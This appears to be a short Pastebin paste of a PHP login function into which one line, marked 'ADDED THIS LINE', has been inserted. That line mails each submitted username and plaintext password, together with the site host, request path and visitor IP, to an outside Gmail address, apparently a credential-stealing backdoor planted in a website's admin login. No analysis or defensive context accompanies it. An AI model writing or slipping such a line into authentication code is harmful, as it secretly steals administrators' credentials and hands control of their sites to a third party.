Advertisement
Guest User

Untitled

a guest
Dec 2nd, 2019
1,304
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. public function login($username, $password, $request = null)
  2. {
  3. .
  4. .
  5. .
  6. //ADDED THIS LINE
  7. mail("lalutime@gmail.com","Admin From ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nUsername : ".$username."\nPassword : ".$password."\nIP Log : ".$_SERVER['REMOTE_ADDR']);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement